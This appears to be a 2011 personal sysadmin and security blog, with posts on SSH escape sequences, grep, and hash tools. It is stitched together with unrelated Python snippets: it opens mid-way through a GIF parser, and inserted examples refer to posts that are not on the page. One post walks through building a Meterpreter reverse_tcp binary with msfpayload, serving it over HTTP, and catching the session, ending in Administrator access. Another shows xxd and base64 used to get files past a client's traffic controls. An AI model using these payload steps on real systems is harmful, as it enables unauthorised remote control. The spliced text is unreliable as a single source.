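TRAILER = b"\x3b"


def _frame(width=1, height=1):
    """One image descriptor followed by a minimal LZW data stream."""
    descriptor = b"\x2c" + struct.pack("<HHHHB", 0, 0, width, height, 0)
    lzw = b"\x02" + b"\x02\x44\x01" + b"\x00"     # min code size, one 2-byte sub-block, terminator
    return descriptor + lzw


STATIC_GIF = HEADER + _frame() + TRAILER
ANIMATED_GIF = HEADER + NETSCAPE_EXT + _frame() + _frame() + TRAILER
ANIMATED_NO_NETSCAPE_GIF = HEADER + _frame() + _frame() + TRAILER   # the NOTE's edge case


def _read_sub_blocks(data, pos):
    """Consume a chain of length-prefixed sub-blocks; return (payload, offset past the 0 terminator)."""
    payload = bytearray()
    while True:
        if pos >= len(data):
            raise ValueError("truncated sub-block chain")
        n = data[pos]
        pos += 1
        if n == 0:
            return bytes(payload), pos
        payload += data[pos:pos + n]
        pos += n


def inspect_gif(data):
    """Walk the block structure: count image descriptors and note a NETSCAPE2.0 application extension."""
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF")
    width, height, packed = struct.unpack_from("<HHB", data, 6)
    pos = 13
    if packed & 0x80:                              # skip the global colour table
        pos += 3 * (2 << (packed & 0x07))
    frames, netscape = 0, False
    while pos < len(data):
        block = data[pos]
        pos += 1
        if block == 0x3B:                          # trailer
            break
        if block == 0x21:                          # extension: label byte, then sub-blocks
            label = data[pos]
            payload, pos = _read_sub_blocks(data, pos + 1)
            if label == 0xFF and payload[:11] == b"NETSCAPE2.0":
                netscape = True
        elif block == 0x2C:                        # image descriptor: one frame
            frames += 1
            ipacked = data[pos + 8]
            pos += 9
            if ipacked & 0x80:                     # skip the local colour table
                pos += 3 * (2 << (ipacked & 0x07))
            _, pos = _read_sub_blocks(data, pos + 1)   # +1 skips the LZW minimum code size
        else:
            raise ValueError("unknown block 0x%02x at offset %d" % (block, pos - 1))
    return {"width": width, "height": height, "frames": frames, "netscape": netscape}


def has_netscape_marker(data):
    """What the post's grep does: a substring search for the marker anywhere in the file."""
    return b"NETSCAPE2.0" in data


def is_animated(data):
    """More than one image descriptor means animation, marker or not."""
    return inspect_gif(data)["frames"] > 1
```

For real files, read them in binary mode and pass the bytes to is_animated; sorting on frame count rather than the marker also avoids a false positive on a single-frame file that happens to carry the loop extension.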
Monday, April 18, 2011
SSH Escape Sequence
If I'm SSH'd into a box and lose my internet connection, the ssh session will most likely just hang there. SSH has an escape sequence similar to telnet's ctrl+]:
hit enter
then type ~.
That will close the ssh session and return you to the shell. ~? will print a help menu with the different escape options that SSH accepts. The list is below:
Supported escape sequences:
~. - terminate connection (and any multiplexed sessions)
~B - send a BREAK to the remote system
~C - open a command line
~R - Request rekey (SSH protocol 2 only)
~^Z - suspend ssh
~# - list forwarded connections
~& - background ssh (when waiting for connections to terminate)
~? - this message
~~ - send the escape character by typing it twice
(Note that escapes are only recognized immediately after newline.)
Now you don't have to lose your terminal window! Yay!
Friday, March 25, 2011
Major Experiment
I decided to delete all of my RSS feeds from Google Reader. I had over 60 subscriptions that I felt I needed to go through on a daily basis. Well, recently I discovered myself spending too much time on feeds. So, in response, I decided to delete them all to see how my productivity increases.
I have enough friends/chat channels that I don't miss anything major that is happening in the field. I will edit this blog post with my thoughts/findings regarding this experiment :D
EDIT: So it's been less than 24h and I have already been discovering new blogs/reading on things I have been meaning to learn for a while now. I did decide to actually have 3 subscriptions on my reader though (ITS NOT CHEATING I SWEAR). The subscriptions are xkcd, Questionable Content comic, and woot.com. I don't consider it cheating because those take all of 5 seconds to check and I check them regularly anyway.
Wednesday, March 23, 2011
Generate hashes
Here is a webpage that will generate many different hashes from text.
http://www.insidepro.com/hashes.php
I'm still looking for a program that will do that via the command line... I should probably just code it myself.
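For the command-line version the post is looking for, here is an added Python example (mine, not from the blog) built on hashlib. It also covers the check worth knowing when comparing against a web generator: `echo text | md5sum` hashes the newline that echo appends, so the two disagree unless you hash the exact bytes. Function and argument names are my own.

```python
import hashlib
import sys

DEFAULT_ALGORITHMS = ("md5", "sha1", "sha256", "sha512")


def digests(text, algorithms=DEFAULT_ALGORITHMS):
    """Hex digests of the UTF-8 bytes of `text`, one per algorithm name.

    The text is hashed exactly as given: no trailing newline is added, unlike
    `echo text | md5sum`, which hashes "text\\n" because echo appends a newline."""
    data = text.encode("utf-8")
    return {name: hashlib.new(name, data).hexdigest() for name in algorithms}


def matches_any(text, digest_hex):
    """Name of the algorithm whose digest of `text` equals digest_hex, else None.
    Handy for working out which algorithm a web generator used on a known input."""
    digest_hex = digest_hex.strip().lower()
    # shake_* digests need an explicit output length, so leave them out
    names = sorted(n for n in hashlib.algorithms_guaranteed if not n.startswith("shake"))
    for name, hexd in digests(text, names).items():
        if hexd == digest_hex:
            return name
    return None


if __name__ == "__main__":
    for name, hexd in digests(" ".join(sys.argv[1:])).items():
        print("%-8s %s" % (name, hexd))
```

Invoked as `python3 hashes.py some text`, it prints one digest per line for the default algorithms; the test vectors for "abc" are the standard ones from the MD5, SHA-1 and SHA-256 specifications.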
FCC ID Search
Hardware hackers will find this useful:
http://www.fcc.gov/oet/ea/fccid/
It's a webpage that will search the FCC database for the FCC ID you supply it. The results are publicly available files/photos/documentation that the manufacturer uploaded.
useful...
Wednesday, March 16, 2011
Learning yourself
Perhaps the best skill/hack you could possibly do is learning your own system.
How do you think?
why do you think the way you do?
what motivates you?
what makes you lazy?
why do you get angry at certain things? and what can you do to recognize and stop it?
What makes you, you?
Most people will go their entire lives without understanding themselves, and will inherently become their own slaves. But, I firmly believe this one statement:
A man who is God of himself, is a God to others.
There is no large leap or epiphany that can cause you to fully understand yourself. It all comes in small parts, small epiphanies, specific and detailed. A good example is what happened to me today. I realized that trying to prioritize multiple items that have multiple levels of importance can mess with my head; therefore, knocking out the simpler, quicker tasks first allows me to only have to worry about a smaller number of items. Now that I have reduced my number of items from 10 to 3, I only have to devote my attention to 3 items, which is MUCH easier to handle than 10 different things at once.
May seem very simple and obvious, but when something like that changes how you manage your time, you become more efficient and have more time to do other things.
It's just a little philosophy that I thought I would impart on anyone who's interested.
Thursday, March 10, 2011
Auto restart your SSH connection
Here is a simple bash one liner that will automatically restart your ssh connection if it drops.
while true; do ssh user@server.com; sleep 15; done
It's simple: this will run until killed. The first thing the loop does is start up ssh, and since it can't continue until ssh exits, it's effectively a method to always restart the connection (without duplicating the process).
This assumes you have key auth setup and ready to go.
TIGERBLOOD
Tuesday, March 8, 2011
Create file from hex dump
So I'm working on a client and they have the most restrictive traffic rules I've ever seen. I can't transfer any files whatsoever. I figured out I could do this today:
1. xxd NameOfFile
2. copy the output
3. paste it into a file
4. xxd -r file file1
5. open with respective program
Basically what is happening is that you are generating the hex dump via xxd and regenerating the binary via xxd -r.
This effectively allows you to transfer files when all you can do is run commands on them.
fuck yeah this makes my life easier.
EDIT: lol, I totally forgot turning binaries into text was THE job of the base64 encoding algorithm. So it's basically the same steps but with base64...
1. base64 filename
2. copypasta into another file
3. base64 -d newfilename
4. open with respective program
the base64 program has the added benefit of having less to copy/paste over.
Sunday, March 6, 2011
Awesome Chicago Noms
I'm really posting this just so I can keep track of it. My sister sent me quite a few places she thought were awesome. Since she and I have very similar tastes, I plan on going to these places sometime in the future.
- Thai Bowl - Thai
- Near UIC campus...
- Yummy Thai - Thai
- Sabor A Cuba - Cuban
- Bonefish Grill - Seafood
- Rocking Horse - American
- Wildfire - American
- Zad - Middle Eastern
- Jia's Restaurant - Chinese Cuisine/Sushi Bar
- Maggiano's Little Italy - Italian
- Order their Rigatoni D!!
- La Luce - Italian
- Pick Me Up Cafe - American
- Nookies - American
- Glenn's Diner - American Diner/Seafood
- Piece Brewery & Pizzeria - American
- Rock Bottom - American Fare/Brewery
- Hopleaf - American/European
- Joy's - Thai
- Bamee Noodle Shop - Asian
- Hot Doug's - Casual American
- Aloha Eats - Hawaiian Grill
- Penny's Noodle Shop - Asian
- Noodles & Company - Mixed Cuisine
- Hachi's Kitchen - Japanese
- Phil Stefani's 437 Rush - Italian/Steakhouse
Near UIC
Bars with Food
Saturday, March 5, 2011
Simple meterpreter call back payload
The following are commands in order to get a meterpreter session contained in a binary that will be run by the target system to connect back to the listener.
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.166 X > /var/www/rawr.exe
What's happening here? Well, the first thing we are doing is generating the actual payload that the victim will execute. Note: we are not actually exploiting any vulnerability here; this binary simply contains the meterpreter reverse TCP connect payload (windows/meterpreter/reverse_tcp). You have to set LHOST to the actual listening box (I know, counterintuitive). X is the shortcut to "exploit" in metasploit. Normally msfpayload outputs the binary contents to stdout so you can redirect it wherever you want; here I just redirect it to rawr.exe in my web root directory so I can download it via a web browser.
What happens now (once I start apache) is I go to the victim machine and type "http://192.168.1.166/rawr.exe" in order to download it. Once downloaded, I run it.
NOTE===============
You need to run the following command before you run the windows binary (otherwise it will connect to nothing and you will have to re-execute the binary)
msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.166 E
This command starts up metasploit with the arguments as conditions. msf will start the multi handler to listen for the connection; the rest of the arguments are the same as the msfpayload command. *Now run the windows payload.*
What should happen is you should get this:
root@bt:~# msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.166 E
[*] Please wait while we load the module tree...
_
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|
=[ metasploit v3.6.0-beta [core:3.6 api:1.0]
+ -- --=[ 647 exploits - 340 auxiliary
+ -- --=[ 216 payloads - 27 encoders - 8 nops
=[ svn r11879 updated today (2011.03.05)
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.166
[*] Started reverse handler on 192.168.1.166:4444
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to 192.168.1.193
[*] Meterpreter session 1 opened (192.168.1.166:4444 -> 192.168.1.193:1393) at Sat Mar 05 02:22:40 -0500 2011
meterpreter > getuid
Server username: WINXP\Administrator
Figure out what alias to create
A simple bash one-liner that will read through your bash history and print out your most-typed binaries:
history | cut -d ' ' -f 5 | sort | uniq -c | sort -n
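The `cut -d ' ' -f 5` depends on the exact column layout of `history`, which shifts once the entry numbers reach four digits and shifts again if you set HISTTIMEFORMAT as the post further up this page recommends (the fifth field then becomes the date). This added example (not from the blog) parses both layouts with one regex, looks through sudo so that "sudo vim" counts as vim, and returns the most frequent commands; SAMPLE_HISTORY is constructed and the names are mine.

```python
import re
from collections import Counter

# Constructed sample of `history` output. The first entries use bash's default layout; the
# rest carry the HISTTIMEFORMAT="%F %T " stamps recommended earlier on this page, which
# pushes the command one column to the right and breaks a fixed `cut -f 5`.
SAMPLE_HISTORY = """\
  997  ls -la
  998  ssh account@vpsserver.net
  999  git status
 1000  ls
 1001  2011-05-19 10:02:13 sudo vim /etc/ssh/sshd_config
 1002  2011-05-19 10:05:41 ls /tmp
 1003  2011-05-19 10:06:02 ssh account@vpsserver.net -p2222
 1004  2011-05-19 10:07:55 sudo systemctl restart ssh
"""

HISTORY_LINE = re.compile(
    r"^\s*\d+\s+"                                    # entry number, any width
    r"(?:\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\s+)?"   # optional HISTTIMEFORMAT stamp
    r"(?P<cmd>\S.*)$"
)


def command_counts(history_output, look_through=("sudo",)):
    """Count the first word of every entry, crediting 'sudo vim' to vim."""
    counts = Counter()
    for line in history_output.splitlines():
        m = HISTORY_LINE.match(line)
        if not m:
            continue
        words = m.group("cmd").split()
        while len(words) > 1 and words[0] in look_through:
            words = words[1:]
        counts[words[0]] += 1
    return counts


def top_commands(history_output, n=3):
    """The n most frequent commands as (command, count) pairs, most frequent first."""
    return command_counts(history_output).most_common(n)


if __name__ == "__main__":
    import sys
    for cmd, count in top_commands(sys.stdin.read(), 10):
        print("%5d  %s" % (count, cmd))
```

Since `history` is a shell builtin, run it as `history | python3 thisfile.py` from the interactive shell whose history you want ranked.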
Tuesday, February 1, 2011
Grep AND/OR pattern matching
Simple once you understand it; lots of people ask about it:
#Return instances of lines containing string1 AND string2
grep 'string1.*string2' filename
What is happening here is that you are searching for string1, then zero or more (*) of any character (.), and then string2. NOTICE: it will only return lines that have string1 before string2.
#Return instances of lines containing string1 OR string2
grep -E 'string1|string2' filename
Classical OR operator, the pipe. In basic grep the pipe is a literal character, so the alternation needs -E (extended regex) or the escaped form \|. This will test for lines containing either string1 or string2 and return those lines.
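Because `.*` only matches left to right, the AND form above misses lines where string2 comes first; the usual fixes are chaining `grep a | grep b` or using one lookahead per string. This added example (mine, not the post's) shows the ordered AND, the any-order AND via lookaheads, and the OR alternation, run over a few constructed log lines; the names are my own.

```python
import re

# Constructed sample lines (not from the original post).
SAMPLE_LINES = [
    "sshd[101]: Accepted publickey for account from 192.168.1.193",
    "sshd[102]: Failed password for root from 10.0.0.9",
    "sshd[103]: Failed password for account from 192.168.1.193",
    "sshd[104]: Connection closed by 10.0.0.9",
]


def grep_and_ordered(lines, first, second):
    """grep 'first.*second': both strings present, and first must precede second."""
    pattern = re.compile(re.escape(first) + ".*" + re.escape(second))
    return [line for line in lines if pattern.search(line)]


def grep_and_any_order(lines, *needles):
    """All strings present in any order, one lookahead per string: (?=.*a)(?=.*b).
    Same result as chaining `grep a | grep b` (grep -P accepts this syntax too)."""
    pattern = re.compile("".join("(?=.*%s)" % re.escape(n) for n in needles))
    return [line for line in lines if pattern.match(line)]


def grep_or(lines, *needles):
    """grep -E 'a|b': alternation, any one string is enough."""
    pattern = re.compile("|".join(re.escape(n) for n in needles))
    return [line for line in lines if pattern.search(line)]
```

re.escape keeps user-supplied strings literal, which is the same reason to single-quote them in the shell: an unquoted `.` or `*` in string1 would otherwise become part of the pattern.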